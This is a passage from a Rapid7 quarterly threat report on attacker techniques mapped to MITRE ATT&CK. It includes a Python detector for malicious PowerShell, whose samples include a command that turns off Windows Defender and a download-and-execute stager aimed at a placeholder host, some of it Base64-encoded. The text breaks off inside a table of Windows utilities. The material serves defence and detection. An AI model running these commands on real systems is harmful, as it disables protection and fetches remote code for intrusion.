Rapid7 Quarterly Threat Report: 2019 Q3

We’ve got something exciting in store for you in this quarter’s Rapid7 Quarterly Threat Report: the MITRE ATT&CK™ framework!


That’s right, we’ve spent the last couple of quarters aligning our data sources with the ATT&CK framework in hopes of gaining more insight into attacker activities and their impact on the organizations we cover in the report … and IT WORKED!



Here are a few key findings that came out of our analysis:


Our MDR team is WAY above the industry average, with the majority of threats identified and remediated in under one day from detection.
The majority of detections fall under the “Execution” tactic of the MITRE ATT&CK™ framework.
Within the “Execution” tactic, we see attackers leaning heavily on PowerShell and on third-party software techniques.


We also decided to go deeper than before into the data from Rapid7’s Managed Detection and Response (MDR) team and analyze the PowerShell and Windows utility usage we see from attackers. We uncovered some interesting trends in the switches and cmdlets that show up in malicious PowerShell, including:


“Set-MpPreference -DisableRealtimeMonitoring $true” to turn off Windows Defender real-time protection.
“Net.WebClient” and “DownloadString” to fetch additional content (typically a second-stage script) over HTTP.
“-EncodedCommand” to pass the script as a Base64-encoded argument, which hides it from simple string matching on the command line and helps evade real-time monitoring.
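As an added illustration (this is not code from the report), the following Python scans process-creation command lines for the three indicators listed above. Because -EncodedCommand carries the script as Base64 of its UTF-16LE bytes, the scanner decodes that argument and checks the plaintext as well, so encoding alone does not hide the other indicators. The sample command lines, the regexes, and the accepted prefix spellings of -EncodedCommand are assumptions made for this example.

```python
import base64
import re
from typing import List, Optional, Tuple

# Indicator patterns for the three findings above. The regexes are this
# example's own assumptions, not the report's detection logic.
INDICATORS = {
    "defender_realtime_disabled": re.compile(
        r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", re.IGNORECASE),
    "webclient_download": re.compile(r"Net\.WebClient", re.IGNORECASE),
    "downloadstring": re.compile(r"DownloadString", re.IGNORECASE),
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand
    # (-e, -ec, -enc, ...). The prefix set here is an assumption that
    # covers the common spellings; "-ex" (ExecutionPolicy) is not matched.
    "encoded_command": re.compile(
        r"-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE),
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext script behind -EncodedCommand, or None.

    PowerShell expects the argument to be Base64 of the UTF-16LE script text,
    so that is exactly how it is reversed here.
    """
    match = INDICATORS["encoded_command"].search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not real PowerShell encoding; leave the raw line to the other checks


def score_command_line(cmdline: str) -> List[str]:
    """Return the indicator names hit by one process command line.

    Both the raw line and the decoded -EncodedCommand payload (if any) are
    scanned, so a Base64-wrapped stager still triggers the download indicators.
    """
    texts = [cmdline]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        texts.append(decoded)
    return [name for name, pattern in INDICATORS.items()
            if any(pattern.search(text) for text in texts)]


def triage(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (command_line, hits) for every line that hit at least one indicator."""
    results = []
    for line in lines:
        hits = score_command_line(line)
        if hits:
            results.append((line, hits))
    return results


def _encode_for_powershell(script: str) -> str:
    """Build an -EncodedCommand argument the same way an attacker would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample stager and command lines (made up for this example,
# not telemetry from the report). example.invalid is a reserved name.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b.ps1')"

SAMPLE_COMMAND_LINES = [
    'powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass '
    '-Command "Set-MpPreference -DisableRealtimeMonitoring $true"',
    "powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/a.ps1')\"",
    "powershell.exe -NonI -W Hidden -enc " + _encode_for_powershell(STAGER),
    r"powershell.exe -File C:\scripts\inventory.ps1",  # benign admin usage
]

if __name__ == "__main__":
    for line, hits in triage(SAMPLE_COMMAND_LINES):
        print(", ".join(hits), "<-", line[:70])
```

One caveat worth keeping in mind: this only sees what is on the command line. With PowerShell script block logging enabled (Event ID 4104), the decoded script is logged by PowerShell itself, which is a more reliable place to look than re-decoding process-creation events.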

For the Windows utilities, below are the top 15 command line utilities used by attackers in the third quarter:


Executable        Description
cmd.exe           The Windows command line interpreter. Attackers use this to interact with the entire operating system.
powershell.exe    The Windows scripting language interpreter. Attackers use this utility to run scripts.
ADExplorer.exe    A Sysinternals (now Microsoft) tool that allows you to visually explore Active Directory and its objects' properties.
rundll32.exe      The Wi ..
